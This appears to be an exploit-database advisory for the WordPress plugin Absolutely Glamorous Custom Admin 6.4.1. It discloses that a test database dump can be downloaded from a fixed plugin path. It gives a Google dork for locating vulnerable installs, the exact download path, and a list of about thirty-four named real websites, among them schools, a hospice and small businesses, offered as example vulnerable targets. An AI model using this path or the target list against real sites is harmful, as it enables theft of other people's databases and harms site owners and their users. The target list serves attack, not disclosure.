WordPress Absolutely Glamorous Custom Admin 6.4.1 Database Disclosure Vulnerability

2018-11-25
ID: 100347
CVE: None
Download vulnerable application: None
#################################################################################################
 # Exploit Title : WordPress Absolutely Glamorous Custom Admin
ag-custom-admin Plugin Database Backup Arbitrary File Download Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Vendor Homepage : wordpress.org
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : inurl:''/wp-content/plugins/ag-custom-admin/''
# Software Download Link :
wordpress.org/plugins/ag-custom-admin/
downloads.wordpress.org/plugin/ag-custom-admin.6.4.1.zip
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]  -
CWE-23 - [ Relative Path Traversal ]
 #################################################################################################
 # Admin Panel Login Path :
 /wp-login.php
 # Database Backup Arbitrary File Download Exploit :
 /wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 #################################################################################################
 # Example Vulnerable Sites =>
 [+]
restaurant-le-lautrec.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
lesgitesdeboucancanot.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+] lebonpicnic.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
yatesdialaride.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
clp-immobilier.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
westernskybooks.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+] zrpath.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
americabusiness.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+] kewwoods.co.uk/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
distributionsfranco.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+] lbu.edu.np/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+] c-pub-studio.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
torrevieja-immo.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+] knightmuseum.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
commanderie-vins-amboise.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
centre-psyrene.fr/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+] jacksonarts.org/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
ysgolgyfunystalyfera.co.uk/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
carletonhouse.co.uk/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
cursodearduino.net/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+] bvhs.co.uk/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+] operaontap.org/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
campingsmleuca.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
traiteurmariage35.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
anandaprofessional.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+] hotelrelax.cz/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+] autour-daix.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
massociedad.org.mx/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
pensaracademy.org/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+] ucoweb.org/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
agencemacmedia.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+]
tidewellhospice.org/volunteerapp/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 [+] 7riversbbbs.org/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
 #################################################################################################
1.1.11-prod (www01)